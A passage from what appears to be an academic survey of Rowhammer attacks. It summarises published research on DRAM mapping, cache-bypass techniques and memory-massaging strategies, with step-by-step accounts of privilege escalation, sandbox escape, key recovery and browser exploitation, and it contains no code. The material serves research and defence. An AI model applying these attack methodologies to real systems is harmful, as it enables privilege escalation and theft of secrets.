in each row of each bank. The DRAM mapping of 6 different processors (Intel Xeon E5620, Intel Core i3-2120, Intel Core i5-2500, Intel Xeon E5-1607v3, Intel Xeon E5- 1670v3 and Intel Core i5-5300U) show that some of the 12 least significant address bits are bank bit, which means that the 4KB page is not always mapped to the same row. They design a data structure to represent memory blocks in the same row using the cache-aligned memory blocks that are keeping in the same row. The data structure is an array of 3 dimensions, the first one represents the bank index, the second the row index, and the third stores an array memory unit mapped to the same row. The second method [55] searches XOR-schemes without need to check the complex logic behind and without need any privileged information regarding the memory. On the other hand, the first method [37] takes lower time to reverse engineering the DRAM mapping, around 2 minutes in comparison with the 20 minutes for the second method and could be implemented in more complex DRAM memory mapper schemes.

4.1.3.3 DMA The DMA (Direct Memory Access) (2.8.1) memory management mechanism provided to the Android OS with an ION API that allows the user to access uncached physical memory.

46

 The DRAMMER attack [2] reserves memory blocks at SYSTEM_CONTIG ION heap, which allocate physically contiguous memory via kmalloc(). The kmalloc() resorts directly to the buddy allocator (2.8) for chunks so larger physical contiguous as the request one. The attacker controls the aggressor rows to perform double-side hammering by controlling the row offsets inside the contiguous allocated block.  The kamalloc() heap SYSTEM_CONTIG has been disabled for userland apps removing the attacker’s primitive to allocate contiguous memory and avoiding the DRAMMER attack [2]. From November 2016 security Android update includes also second mitigation propose by Google that reduces the maximum pool size’s number to 64KB, making more possible to obtain fragmented memory pieces that are not physically contiguous. The new attack proposed from the same researching group to overpass such countermeasures is called RAMpage [60]. They use the ION SYSTEM heap that is still available but provide memory blocks that are not guaranteed to be physically contiguous and are from different memory zones. The buddy allocator behaves predictably providing contiguous memory pages directly to the ION’s internal pools. Then, it is a high probability of getting contiguous physical memory in practice that can be used to trigger a double-side rowhammer attack. To guarantee reserve memory at the lowmem zone, in which the sensitive data is allocated, they just exhaust the highmemory zone before. Lastly, they just confirm that allocated chunk are contiguous by either triggering double-side rowhammer and checking for flip bits or by using the bank-conflict side channel propose in Glitch [57] [58] (4.1.3.4)

4.1.3.4 Row-conflict side channel for detecting contiguous memory: The GLitch rowhammer attack [57] [58] is based on a Timing Side Channel attack that can leak information about the state of the physical memory. The specific information is used to detect physical contiguous memory allocation directly in JavaScript. The attack relies on the timing increased due to the row buffer conflict when two rows of the same bank are accessed. First of all, they are able to allocate contiguous memory on Adreno GPU by using the alloc_page() macro that queries the Buddy allocator (2.7) for single pages. In order to allocate physically contiguous memory, they need to exhaust all the memory from order 0 until n. The order n must satisfy the constraint of 3 consecutive rows to perform double-side rowhammer. For the example of Snapdragon 800/801 chipset with 64KB row alignment, which means 16 pages, it is necessary allocations of order 6 to cover the 64 (26) contiguous pages which span over 4 complete rows. In the second place, they detect the contiguous area using a timing side-channel attack tool that measures differences between row hits (the accessed row is already at the row buffer) and row conflicts (the row buffer must be flush to keep the new access row) in order to deduce information about the order of the allocation. They heuristically identify the order of the underlying allocation by study the mean access time to a hit pattern. The hit pattern is composed of 15 pages inside of the 16 pages of a full row and is run for each page within 512KB. So can be easily found out an allocation order limit of 4, that corresponds with a block of size 64KB (row size).

47

4.2 FAST UNCACHED DIRECTLY DRAM ACCESS The attacker must access the DRAM chip fast enough to trigger the rowhammer bug. The main challenge is bypassing the CPU caches (2.3) to make sure that every memory access propagates to the DRAM. Various methods have been used to bypass, clean or nullify all levels of cache in order to have direct access to the physical memory. The attacker needs to either flush the CPU cache or use uncached DMA memory to bypass CPU caches altogether. Various techniques are being summarized in this section (Table 7).

Uncached Directly DRAM Access Techniques clfluh Eviction Set Cache Non-Temporal DMA

GoogleProject0 ✓ Non-Temporal Rowhammer ✓ Curious case of Rowhammer ✓ ✓

Dedup Est Machina ✓ Flip Feng Shui ✓ One bit flip, one cloud flop ✓

DRAMMER ✓ SGX-Bomb ✓ Another Flip in the Wall ✓

Glitch ✓ Trowhammer ✓ RAMPAGE ✓

PFA ✓ Nethammer ✓ ✓ Still Hammerable ✓

Rowhammer.js ✓ DRAMA ✓ ANVIL ✓ Good go Bad ✓

Table 7 Various techniques used to access directly the DRAM

4.2.1 Explicit cache flush The first method uses directly the CLFLUSH command available on userspace (userland) for x86 architectures [1] [71] on attacks such as GoogleProject0 [45], One Bit Flips, One Cloud Flop [55] and PFA [61]. In addition, a rowhammer vulnerability open code test relying on the clflusf instruction for x86-32 and x86-64 can be found at the Google repository on GitHub [72]. The clflush instruction flushes data from all the cache levels at the entries associated with a given address. It must be executed between subsequent reads operation at the same address to guarantee access to the DRAM.

48

The Cross-VM rowhammer paper [55] tests the effect of an additional mfence instruction before entering the next loop to force clflush to take effect before the next access. They find out that rowhammer without mfence is more effective than with it when double-side rowhammer is used. Ensure that all the memory accesses reach the memory slow down the program execution reducing the effectiveness of the row hammer attack. The Flip Feng Shui [42] implementation relies on a variant of double-side rowhammer propose it at GoogleProject0 [45] which use clflush instruction to evict the CPU cache between memory access. The SGX-Bomb [56] uses the clflushopt assemble instruction to invalid from every level of the cache hierarchy the linear address specifies it, avoiding the CPU cache between each memory access. The Nethammer [62] proves that can be induced bit flips using a not-default network driver implementation that uses clflush in the process of managing a network packet on an Intel i7- 67000K CPU. They achieve to flip bits remotely just by sent UDP packets. The Still Hammerable [63] approach perform clflush between reading accesses and execute a memory mfence to ensure that the flush operation has finished during the trigger of the one- location rowhammer method. On the other hand, the Curious case of Rowhammer [54] uses the clflush instruction to identify the DRAM bank by implemented a row-buffer side channel attack. The clflush instruction could be executed even by a non-privilege process at x86 architecture. One of the first rowhammer mitigation strategies involves restricting access to clflush instruction. For example, Google updates the sandbox NaCl’s x86 validator to disallow the CLFLUSH instruction (tracked by CVE-2015-0565), to prevent the loaded of any code containing the specific instruction [45].

4.2.2 Cache Eviction sets New and different eviction strategies have been proposed as a replacement for the cflush instructions. The aim of such strategies is to find an eviction set that contains addresses belonging to the same cache set of the aggressor rows. A cache eviction set is defined as a set of congruent addresses and two addresses are congruent if and only if they map to the same cache line. The addresses that below to the same congruent set with our aggressor row made up the cache eviction set. The eviction of the aggressor address data from that cache is forced by access one after the other every address belong to the eviction set. We summarize at this section all the various methods to find the eviction set that has been published to date.

4.2.2.1 CPU Cache evictions The process of finding an efficient eviction set that can be used to implement a rowhammer attack [49] confront significant challenges. In the first place, must generate at least the same number of conflict memory accesses than the last level cache associativity which is high (8 way or 16-way) in modern processors. In addition, the replacement policies used at real hardware are not publicly disclosed. The reverse-engineering researches have found complex addresses

49 functions that are congruent in the cache (2.3), but it leaves a non-trivial problem of finding the access sequences that achieve high eviction rates at low execution time. Also, the replacement policy influences the number and the pattern of accesses needed for a specific eviction strategy. Finally, extra challenges could be found when the mapping of an address to a cache set is made via physical address, because the mapping algorithm is not publicly disclosed, and user level application may not have access to virtual memory mapping.  The ANVIL [49] researches demonstrate a clflush-free rowhammer attack on a laptop with an Intel Core i5-2540M (Sandy Bridge) processor and 4GB DDR3 DRAM module. It does not make an end to end attack instead, present an algorithm to carry on clflush-free triggering bits and propose a Software-Based Protection against rowhammer called ANVIL. They present a methodologic to find out an eviction set for a specific architecture. At first step, they study the target CPU cache architecture, in this case, the processor has three levels and the last level is inclusive, shared and, physical indexed 12-way cache. It is enough to evict the word from the last level to bypass the whole cache hierarchy for inclusive cache, just 13 addresses are necessary to compose the eviction set. They must find the memory addresses mapping for the specific microarchitecture as well (2.3). Then, they can create an eviction set by first picking the aggressor address and then using their physical address to find 12 more addresses which matching with the cache set mapping. Furthermore, they generate a high miss-rate pattern that cyclical accesses the 13 addresses and using performance counters to determine whether each access was a cache hit or miss. Finally, they achieve a time efficient memory access pattern by always driven the aggressor address to the last recently used position in the replacement state. In order to implement a CLFLUSH-free double-side rowhammer attack, they use a 110K times the access pattern and the aggressor row in order to produce a flip bit at the victim row.  The Rowhammer.js [3] is a scripting language-based attack that can be triggering remotely by using web browsers. It describes an algorithm to find an optimal eviction strategy for an unknown cache replacement policy. They target to find an eviction set that can be used as a replacement for clflush instruction in the trigger of the rowhammer vulnerability and effective for both pseudo-LRU and adaptive replacement policies without significant timing overhead. Their Adaptive Eviction Strategic Algorithm finds an eviction set by performing a timing attack, regardless of the replacement policy. The cached(p) method try to evict the p address with the actual eviction set and decides whether access was cached or not based on the access time. At the first step, the algorithm continuously adds addresses to the eviction set until can clearly measure the eviction of the target physical address. Secondly, replaces all the accessed addresses that have no influence on the eviction with addresses that have in order to minimize the number of different addresses in the eviction set. In the final step, it is randomly removed all addresses that have no influence on the eviction.  At the Dedup Est Machina [46] an end to end JavaScript based attack against the Microsoft Edge browser is presented. They use a similar cache reduction algorithm to the ones at [3] to find minimal eviction sets in a fraction of second. They have achieved a

50

faster algorithm by investigating the specific way that Windows hands out physical pages. The addresses that are 128KB apart are often in the same cache set in Windows. They include this property on their algorithm to quickly find cache eviction sets for the memory location that they intend to hammer.  A software-driven fault attack on public key exponentiation by inducing a bit flip in the secret is presented at paper Curious case of Rowhammer [54]. The first attack step aims to determine the cache set in which the secret exponent is mapping. They devised a PRIME+PROVE methodology to learn the cache slice function line by using [73] and then identify the target cache set and slice which collides with the secret. At their Intel Bridge test machine with LLC of 12 ways associativity (k) and 4 cache slices (m) they need 2048 sets. Each set is targeted one after another. It starts by priming a set with elements for the eviction sets, then allowing to decryption to happened (victim row is accessed) and again observing the timing required for accessing selected elements from the set. Access only 푘 × 푚 addresses may not be enough to guarantee the eviction of the cache line [3], in addition, they present an alternative strategy based on the approach presented at [3].  The Another Flip in the Wall attack [43] presents a technique called replacement-aware to deterministically evict a page from the cache. They aim to avoid the memory exhausted techniques that risk to system crash used in previous Rowhammer attacks. They use for their eviction set only cache pages that are not visible in the system memory utilization. The specific cache pages can be evicted any time without the system run out of memory. Also, they introduce a method called mincore that informed about whether a given page is evicted from the cache. In this way can be aborted the replacement-aware page cache eviction as soon as the target page is evicted.  The Good go Bad [53] technique aims to find out the cache slice mapping to be able to devise the access pattern that evicts the aggressor addresses. They generate sets of potentially conflicting random physical addresses and dig timing-based side-channel analysis to find out the bits used in the cache set and slice selection. They exhaustive searches over the collected conflicting address pairs to find the unique XOR combination used for the cache slice selection. The most astonishing aspect in their technique is that they abusing CAT technology 4 to reduce the number of accesses (hence the time) required to produce conflicting cache misses. In fact, their experiments find out that on a CAT-enable processor with 1-way LLC assigned for each core is more efficient to generate conflict set misses that CLFLUSH-based attacks, reducing the time to flip a bit more than half. This advantage allows triggering flips bit with rowhammer at the double refresh rate.  The Nethammer [62] exploits the CAT technology of Intel Xeon to remotely flip bits on a System just by send UDP packet. If the CAT-enable processor limits the number of cache ways to a single one for code handle the processing of UDP packets, the eviction of the

4 Cache Allocation Technology (CAT) has been developed by Intel with the aims to enable more control over the LLC cache and how core allocates into it. The system administrator can force the individual cores to allocate just at reserve ways of the cache by assigned a class of service to each core. Then each core is limited to allocate and therefore evicting, cache lines form their specific subset.

51

cache is faster. If a function is called multiple times for one packet probably the address is accessed and loaded from the specific DRAM location that is being hammered. The most part of the previous attacks bases their cache eviction search process on measure precisely the access times to data. A key challenge is being able to build a precise timer as it is on Side Channel Attacks.

4.2.2.2 GPU Cache evictions The Glitch [58] attack is a GPU5 based attack that needs to bypass the GPU cache in order to access the DRAM directly and trigger Rowhammer. Therefore, they need to build efficient eviction strategy to bypass the 2 levels of cache. First of all, they aim to deduce the cache attributes such as cache line size, cache size, associativity, and replacement policy by running different shaders GLSL codes on the GPU. They gain 4 Bytes granularity access to memory with the OpenGL texture2D() function that interrogate the process to retrieve the pixel´s data from a texture in memory. Parallel, they monitor the usage of the caches through the performance counters available by the GPU´s Performance Monitor Units (PMU). In order to recover the cache line size, the shader accesses consecutive the smallest possible value (4 Bytes) and sequentially increasing the maximum for the same value until encounter 2 cache misses. The cache size is discovered by monitoring the time to access blocks of increases sizes. It stars accessing cache line size and increases the size until larger time access is performing. The relation between cache misses and cache requests confirm them the set- associativity type of the cache. To find out the associativity number they use a dynamic eviction sets (S, E, Pi) where S is the set that contains the necessary number of elements to fill up the cache, E initially contains a random address that is not part of S and, 푃𝑖 is the set of elements to probe (푃𝑖 = 푆 ∪ 퐸0). The experiment increases i until the eviction of cache is detected, then the corresponding address is added to E and restart the process repetdly until 푃𝑖 = 퐸0, when every cache line of the set has been evicted. Then, the size of E is the associativity number and the replacement strategy can be found by filling up the cache set and accessing again the first element before the first eviction. L1 UCHE (second level cache) Cacheline (Bytes) 16 64 Size (KBytes ) 1 32 Associativity (# ways) 16 8 Replacement policy FIFO Inclusiveness Non-inclusive Table 8 GPU Two-Level Cache Summary

5 The GPU (Graphics Process Unit) is a processor design to handle graphics operations with the aim of accelerating graphics rendering and image processing. An integrated GPU architecture is composed of multiple Stream Processors (SP) that run parallel the Shaders GPU programs with different inputs. Also, each SP incorporate multiple ALU (Arithmetic Logical Units) to parallelize the computation. The Texture Processor (TP) provides to the SP with additional input data during the execution typically in the form of textures. The textures and the vertices are data stored at the DRAM due to its large size. To speed up the access to these data the GPU includes a multi-level cache hierarchy, of usually 2 levels.

52

Furthermore, they need to build an efficient eviction strategic based on the achieved knowledge Table 8. They achieve to evict both of the caches by using the technique shows in Figure 20 that altern 9 memory access.

Figure 20 Efficient GPU cache eviction strategy. Figure in [58]

They compare their GPU-based eviction strategic with the CPU-based native eviction strategic of Rowhammer.js on different mobile vulnerable platforms. With the Rowhammer.js eviction strategy, not flip bits are triggered, the eviction of CPU cache is too slow to trigger Rowhammer bit flip. Otherwise, their technique achieves to flip bit remotely in less than 40 seconds.

4.2.3 Non-Temporal store instructions Another approach is proposed in Non-temporal Rowhammer [47], rowhammer is triggered with non-temporal store instructions taking advantages of its cache bypass characteristic. The non- temporal instructions were introducing by CPU vendors for supporting cache ability control. The programmers or compilers can minimize cache pollution by using non-temporal instructions for data that is referenced just once and not again in the near future. The specific instruction does not cache the accessing data bypassing the cache, for this reason, has been exploring their use for triggering the rowhammer bug. The memory used by non-temporal stores may be combined in the Write-combining (WC) buffer (Figure 21) to reduce DRAM accesses when writing to the same address just the last one go through to the DRAM chip. So to make sure that each access will go through to the DRAM, the WC buffer must be flush. Each non-temporal access is followed by a cache memory access to the same address in order to evict the WC buffer. The non-temporal stores are used in the memset/memcpy implementations, 4 out of 6 popular libc implementations use it. In general, there is a threshold value for each implementation: if the requested size is large enough the non-temporal store-based version is executed. They successfully triggered bit flips using Newlib version but for other implementation such as libc failed due to the much larger latency because of the need to move large size data. Nonetheless, the Newlib is used on various embedded systems such as The Red Hat GCC distribution, Cygwin. Notice that Google´s Native Client has forbidden the use of non-temporal instructions in their Newlib port as mitigation to rowhammer.

53

Figure 21 Cached and non-temporal memory accesses. Figure in [47]

4.2.4 DMA access The Direct Memory Access (DMA) feature (2.8.1) provides the userland apps with the ability to access memory directly without to involve the CPU processor. This feature has been exploited to provide to the rowhammer attackers with un-cached memory accesses.  The investigations under ARM architecture (DRAMMER [2] and RAMpage [60] attacks) use the DMA memory management mechanism as the best way of bypassing CPUs and their caches on Android systems. They use the DMA Buffer Management APIs by using the ION main memory manager, which allow userland apps to access uncached memory. A deep explanation of this method is given in the following sections (6.3.1).  The Thorwhammer attack [59] uses a Remote Direct Memory Access feature on high- performance networking that delivery network packets directly to the RAM without involving the CPU on both client and server. It uses two processes, running one on a server node and one on a client node, which both nodes connected via RDMA network. The server process allocates a large virtually-contiguous buffer that is configured as a DMA buffer to the NIC6 . The Client-side repeatedly asks the server NIC´s for packets with data from the buffer at different offsets. The packet is reading directly from the DRMA buffer at the DRAM without being caching at the CPU due to the Direct Memory Access feature. The ability to produce bit flips remotely on an RDMA network depends on the network performance. The number of flip bits depends on the number of packets that can be sent over the network which corresponded with the times that the row is forcing to be open at DRAM. They observe flip bits by accessing 560000 times the memory in 64ms, which need a network that can make at least 9 million accesses per second. It had been proved that even regular 10 Gbps networks, used in companies or university LANs, can trigger

6 The NIC (Network Interface Card) include a feature called zero-copy network that makes possible to read data directly from the main memory of one computer and write that data directly to the main memory of another computer.

54

remotely bit flips after just 700.7 seconds. The number of flip bits over time for different network velocity configuration is presented in Figure 22.

Figure 22 Rowhammer bit flips for different network configurations. Figure in [59]

4.3 WHERE TO HAMMERED An attacker needs to be able to trigger bit flips at sensitive data in order to exploit success the vulnerability and implement an end-to-end attack. Table 9 shows a summary of the different techniques used in each attack to hammered an exploitable location. Random Memory Massaging Memory Hammer Sensitive data Memory MMU Buddy Waylaying Spraying Deduplication Paravirtualization Allocator GoogleProject0 ✓ Non-Temporal RH ✓ Curious case of RH ✓ Dedup Est Machina ✓ Flip Feng Shui ✓ One bit flip, one cloud flop ✓ DRAMMER ✓ SGX-Bomb ✓ Another Flip in the Wall ✓ Glitch ✓ Trowhammer ✓ RAMPAGE ✓ PFA ✓ ✓ Still Hammerable ✓ Nethammer ✓ Table 9 Where to Hammer

4.3.1 Random Hammer The attacks at this section just hammer different memory positions until a flip bit is found at the vulnerable location that meets the attack requirements. All of them are probabilistic approaches that lay on the lucky to find vulnerable bits at desired locations.

55

 The Curious Case of Rowhammer [54] attack aims firstly to find out the DRAM location that contains the sensitive data under attack (the secret exponent key) and secondly try to flip bits at the specific location by triggering rowhammer. This approach is a probabilistic once and depends on how much vulnerable it is the bank that contains the secret exponent. The probabilistic of flip a bit at the secret key is related to the secret key size and, is generally low. Also, it is not easily reproducible on a different device due to the vulnerable memory regions naturally differ per DRAM chip.  The SGX-Bomb [56] attack lunches their double-side rowhammer attack to their enclave address. After each round of hammering, they read the entire heap address in the enclave. The SGX mechanism checks the occurrence on any bit-flipping on each address read, if finds any flip the memory controller locks the entire processor.  The Nethammer [62] attack sends fast UDP packets through a fast network to a System without any control where the physical memory bit flip is induced. Then they do not know what is stored at the specific location and the flip bits can lead to different consequences depending on the memory it corrupts. In their experiments they achieve kernel image corruption, the system cannot boot anymore so they assume that the flip bit happened in an inode of the file system. Furthermore, they detect flip bits at kernel modules such as network drivers and others that immediately halting the entire system. More than that, they find flip bits at userspace libraries that crashed the running processes due to segmentation faults and, on one occasion the flip bits block any user to log in via SSH at the system.

4.3.2 Physical Memory Massaging It is indispensable to trick the victim component into storing security-sensitive data in a rowhammer vulnerable physical page to be able to trigger deterministic attacks. Four are the steps to trigger an exploitable bit flips successfully on the most part of the attacks until the date: Memory Template, Memory Massaging, Trigger Rowhammer, and System Abuse. The most part of researches finds first which exact memory locations are susceptible to Rowhammer. A Memory Template phase is run at the beginning probing physical memory in the looking for flip-able bits. The process starts filling the memory blocks with known data, usually 0s or 1s depending on what flip direction is going to be tested. Afterwards, the rowhammer code is triggered to find out the location of vulnerable bits. A template that contains the location of vulnerable bits, as well as the direction of the flip is returned. Also, there is a need to investigate which of the vulnerable bits can be exploited in relation to the target sensitive data. Secondly, a victim component must be trick into storing security-sensitive data in a vulnerable physical memory page chosen by the attacker. This steep is called Memory Massaging and the most important used techniques will be described in this section. As soon as the sensitive data is placed at the vulnerable region the attacker must trigger rowhammer to flip the bits at the selected sensitive data by using one of the different methods presented in a previews section (3.2.1). In the end, the System under attack is abused by exploiting the flip bit produced at the sensitive data.

56

4.3.2.1 Sensitive Data Spraying The first strategic proposed ever for exploit rowhammer bug is a probabilistic one that just sprays the memory with sensitive data hoping that at least one of them lands on a physical memory page vulnerable to Rowhammer. The different attacks based on this strategy are:

4.3.2.1.1 Page Table Spraying The GoogleProject0 [45] [71] exploits the Rowhammer bug to achieve root privilege escalation by flipping bits in page table entries (PTE). They spray physical memory with page tables and hope that at least one of them land on a vulnerable physical page. It aims to trigger a bit flips in a PTE so that points to an arbitrary physical memory location. Under memory pressure of many sprayed physical layout, this location could probabilistic be one of the attacker-controlled page tables. This provides to the attacking process with read-write access to one of its own page tables, and hence to all physical memory. In x86-64 architectures the Page table is a 4KB page containing an array of 512 PTEs. Each PTE is 64 bits Figure 23. The flip bit can be injected in two different locations within the PTE: in the bit, RW, associated at the Writable permission or else in the Physical-page base address which will have a bigger probability (31 % chance) of success.

Figure 23 4-KByte Page Table Entry

They achieve privilege escalation by following the steps outlined below:  Memory Template: They allocate a large chunk of memory and search for location prone to flipping by triggering their random rowhammer approach (4.1.1). They must check if the specific flip bit is exploitable too. On this occasion, a bit is exploitable if fall into the right spot in a PTE: at the physical page base address field.  Memory Massaging: Next, the particular memory area is returned to the Operating System. The attacker allocates massive quantities of the virtual address space to forces the OS to reuse the memory for PTEs allocations.  Trigger Rowhammer: They cause the bit flip using their random rowhammer attack and shift a PTE to point into an attacker Page Table.  System Abusing: The process has read/write access to one of its own Page Table then can achieve read/write permission all over the physical memory.

57

4.3.2.1.2 Risk sequence Spraying The GoogleProject0 [45] [71] research introduces the second kind of attack that targets the Sandbox for running native (NaCl) code at Chrome. The attack aims to overpass the NaCl sandbox model that prevent jumping in the middle of an x86 instruction. NaCl uses a validator to check that the code conforms to a subset of safety instructions before running an x86-64 executable. The indirect jumps can only target 32 byte aligned addresses, the flip of a bit could make the program to jump out of the restricted address zone. This attack is now no possible due to the countermeasures applied later of the attack publication, the NaCl´s x86 validator was modified by disallowing the clflush instruction. The steps of the attack are:  Memory Massaging: They spray many copies of their instruction sequence. In fact, they fill the sandbox dynamic code with 250MB of an indirect jump instruction sequences.  Trigger RowHammer: They cause the bit flip using their random rowhammer attack and look for bit flips. The sandbox program´s code is readable. Can be determined where the bit flip occurred and where or how the flip can be exploited.  System Abusing: The flip bits make the instruction sequence unsafe, 13 % of the possible flip bits modify the jump register number which could contain a non-32-byte aligned address. Once a program can jump to an unaligned address it can scape sandbox, because it is possible to hide unsafe x86 instruction inside the safe ones [71]. The PFA attack [61] aims to inject a permanent fault at the shared T-Table of the binary file of Libcript. The exploit finds out the AES encryption key of a victim process on the same System according to the following steps.  Memory Template: The attacker looking for vulnerable memory locations creating a profile for the physical memory before the victim process runs.  Memory Massaging: The attacker aims to allocate the shared T-table¸ that is used from both victim and attacker processes, into the vulnerable rows. The OS allocates the shared library to a random location in the page cache each time is loaded, based on concurrent memory used. Then, several reloaded of the shared library are make it until is allocated at the desired address. The attacker determines the row in which the victim library is located using the row ID of the physical address and tries to locate virtual pages that are mapped to rows that are physically adjacent to the target. After that, the attacker keeps spraying blank pages to the memory with mmap while checking if their physical address is an adjacency row to the victim one.  Trigger Rowhammer: The attacker trigger double-side rowhammer by accessing both victim adjacency rows that have been found at the preview steep to flip a bit permanently at the T-Table.

58

 System Abusing: At this point, the attacker must implement Fault Permanent Analysis 7 to find out the AES-128 encryption key.

4.3.2.1.3 Risk sequence Spraying Interleave with aggressor rows Another approach is presented at Non-Temporal [47]. They aim to trigger bit flips in a sandboxed code but this time the aggressor row should contain data instead of code. The code is read-only and cannot be accessed with non-temporal instructions, then an aggressor data row must be physical adjacency to code victims’ row. The data and code rows need to be sufficiently interleaved because the aggressor addresses page is picked up randomly.  Memory Massaging: To get the desired mapping they need to create a high memory pressure by using a memory eater program that reserves most of the remaining physical frames before the NaCl process starts. Then, the NaCl process unmaps a random chunk from the reserved memory before to allocate code. Because of the high memory pressure, the code will be likely served from the unmap chunks. This approach is repeated until half of the memory is filled with code. The other half of the memory is filled with data at random physical frames. The remote thread needs one or more NaCl memory consuming modules on the same web page to create the memory pressure.  Trigger RowHammer: They trigger their random rowhammer attack based on non- temporal instructions and look for bit flips. The sandbox programs are readable then can be determined where the flip bit occurred and where or how the flip can be exploited.  System Abusing: The system can be abused on the same way described at the previews section for GoogleProject0 [45] attack.

4.3.2.1.4 Pointer Spraying The Glitch [58] attack leaks pointers and creates references to counterfeit objects to be able to get an arbitrary read/write primitive.  Memory Template: They find exploitable bit flips by trigger their shader program on the GPU over the target textures. To exploit an ArrayBuffer they can use the 0-to-1 bit flip at the size field of the array that allows the attacker to increase the size to cover the metadata to the following object. Instead of they can trigger 1-to-0 bit flip inside the data pointer to allows the attacker to pivot the pointer toward other data structure. Under this condition, they find out that a bit flip is exploitable in more than 22% of locations within a page.  Memory Massaging: The WebGL uses a specific memory pool for storing textures that contain 2048 pages. After realizing their target texture, they start to allocate the ArrayObjects which will contain data that later will be corrupt. They use a probabilistic

7 The Persistent Fault Analysis (PFA) is a fault model that assume that a fault persists and can affect multiple rounds overpassing Dual Module Redundancy (DMR) Fault Injection Countermeasures. For a complete persistent fault attack firstly is trigger a fault injection stage in which the attacker injects the persistent fault before the first encryption which makes all interaction of the algorithm to be computed with the faulty constant. Secondly, at the encryption stage, the attacker waits for the victim to start the encryption. Finally, at the analysis stage, the mix of correct and incorrect ciphertexts, due to the persistent fault, is analysis with PFA to recover the secret key.

59

approach whose probability depends on the status memory. To land sensitivity data on the vulnerable location first they free the vulnerable texture and then trigger the JavaScript engine to request such page by allocating multiple instances of their data target.  Trigger Rowhammer: Now that their ArrayBuffer is landed on the vulnerable page they run again their shader program in the GPU to trigger the bit flips on the ArrayBuffer´s metadata. Depending on the field they hammer, size or data pointer, they gain access either to the consecutive object or to another object stored at 2푛 bytes away, where n is the flip bit position Figure 4.

Figure 24 Heap layout and exploitation. Figure in [57]

 System Abusing: They win control over the metadata of another object with write/read permission which allows them to corrupt the data pointer and the size of the ArrayBuffer.

The Trowhammer attack [59] aims to corrupt a Memcached8 hash chain pointer h_next that will pivot to pointed to a counterfeit encode inside a legitimate item following the same approach that the before attacks Dedup Est Machina [46] and Glitch [58].  Memory Template: They aim to template memory to find out vulnerable locations. Firstly, they spray the entire available memory with 1 MB size key-value items to make sure that some items eventually border on the initial 16MB RDMA buffers. Then trigger the rowhammer at the RDMA buffers remotely. Finally, GET requests the items to check which bit offset have been corrupted and find the appropriate ones to be exploited. On this case, they try to land the h_next pointer of the item at a flip bit location.  Memory Massaging: They spread the memory with items whit a size that maximizes the probability of corrupting the h_next pointer.  Trigger Rowhammer: They re-trigger the bit flip on the desire location memory by transmitting packets from the DRAM buffers performing double-side rowhammer until corrupt the target item´s h_bext pointer.  System Abusing: The flip bit makes the pointer to point inside another item whose key- value is under the control of the attacker. The counterfeit header inside the value area is carefully crafting to gain either a limited read or write capability. Then n bytes contiguous

8 The Memcached is a key-value distributed memory store. The clients can store and retrieve items from a server using keys that can be any character string. A client can identify the destination server using a hash function on the key. Then, there is no central server to consult and the architecture is inherently scalable. It stores key/value pairs as items with memory slabs of size from 96 bytes to 1MB. Memory allocated is broken up into 1MB size chunk and assigned into a slab. The struct _stritem structure is used for storing the metadata of the item at the first 50 bytes and on the remaining space the key and the value. The items are chained together into two lists, the second single linked list is traversed when looking up keys with colliding hashes identifying by the h_next pointe [114].

60

are retrieved from Memcached address space by issuing a GET request on the counterfeit item. The linked item triggers a relink operation on the next GET, then by controlling *next and *prev pointers can be obtained a limited write primitive where *prev=next and *(next+8)=p, if p and n are not NULL (Figure 25).

Figure 25 Memcached Exploit. Figure in [59]

4.3.2.2 Memory Deduplication The memory deduplication feature exposes the system to a side-channel attack due to the timing difference between write on a shared copy and writes on a regular copy. The increase on the timing to write on a shared copy, that results in a page fault and subspecialty page copy can be used from an attacker to detect when a given page exists in a system. Earlier studies use this side-channel attack just for fingerprint applications [74] or at most for leaking a limited number of bits from the victim process [75]. In this section, we describe how the memory deduplication technique can be used to provide the attacker which stronger primitives in combination with rowhammer. The memory deduplication can be used to trick the OS into mapping two pages, an attacker controlled virtual memory page and a victim owned memory page, to the same attacker chosen rowhammer vulnerable position. An attacker that controls the alignment and reuse of data in memory is able to perform byte-to- byte disclosure of sensitive data. The deduplication-based primitives used at the attack depends on the alignment of memory properties [46]. Alignment probing: If the attacker can change the alignment of secret data with weak alignment properties fewer or more bits of the secret may be proved, and the attacker can shift the secret up and down in memory. In this way, the entropy is reduced by brute force using deduplication byte per byte of the secret.

61

Figure 26 Alignment probing primitive. Figure in [46] Partial reuse: If the attacker-controlled input can partially overwrite stale secret data with predictable reuse properties, a craft primitive that allows an attacker to perform byte-by-byte probing of secret information by controlling partial reuse pattern could be used. The application often reuses the same memory page and selectively overwrites the content of a reused page with new data. If a secret data was previously stored at the page the attacker can overwrite part of the secret and brute force the remainder.

Figure 27 Partial Reuse primitive. Figure in [46]

Birthday heap spray: This primitive can leak secrets even when the attacker has no control over memory alignment or reuse. It is relying on the birthday paradox, the probability of at least two people in a group, even for modest size groups, having the same birthday is high. On the one side, the attacker forces the application to controllably spray target secrets over memory by generating S pages, each with a different secret pointer. On the other hand, the attacker creates P probe pages, with P being roughly the same size as S. The memory deduplication automatically tests all the P possible probe pages against the S target secret pages and if a hit on any happened the target secret is immediately exposed.

Figure 28 Birthday heap Spray primitive. Figure in [46]

62

4.3.2.2.1 Dedup Est Machine The researches at Dedup Est Machina [46] presents an end-to-end remote Javascript based attack against the Microsoft edge browser. They combine their new deduplication base primitives described before with a reliable Rowhammer exploit to gain arbitrary memory read and write access in the browser. The exploitation steps are:  Memory Template: They allocate a large array filed with doubles, find eviction sets and hammer 32 pages at a time reading from each page 2 million times. They find out which bits can be flipped at which offsets by scanning a sufficient number of pages.  Memory Massaging: The target is now to place at the vulnerable memory location some data of the array which, after a bit flip, can yield a reference to a controlled counterfeit object. The attack craft a valid large counterfeit object by using the alignment probing primitive to leak the code pointer to the Chakra’s binary and the birthday heap spray primitive to leak the heap pointer. A reference to a valid object is stored at the vulnerable location inside the large double array carefully choosing in a way that, when trigger the flip bit its reference point to our counterfeit object.  Trigger Rowhammer: They trigger the rowhammer vulnerability using the specified array offsets and at this step, the attacker has access to a bit flip inside a controlled array. The bit flip pivots the reference to point to the counterfeit object.

Figure 29 Flip bit exploitation: Pivot to a counterfeit object. Figure in [46]

 System Abusing: The counterfeit object provides to the attacker with arbitrary write/read primitive and gaining code execution is achieved. Must be noticed at this point that in order to trigger the rowhammer from Javascript they reduced the DRAM refresh time, similar to Rowhammer.js [3]. This means even at the publication moment the attack could not be produced under the by default system configuration.

4.3.2.2.2 Flip Feng Shui (FFS) The Flip Feng Shui (FFS) [42] is an exploitation vector that induces hardware bit flips over arbitrary physical memory in a controlled fashion. The specific implementation at [42] exploits

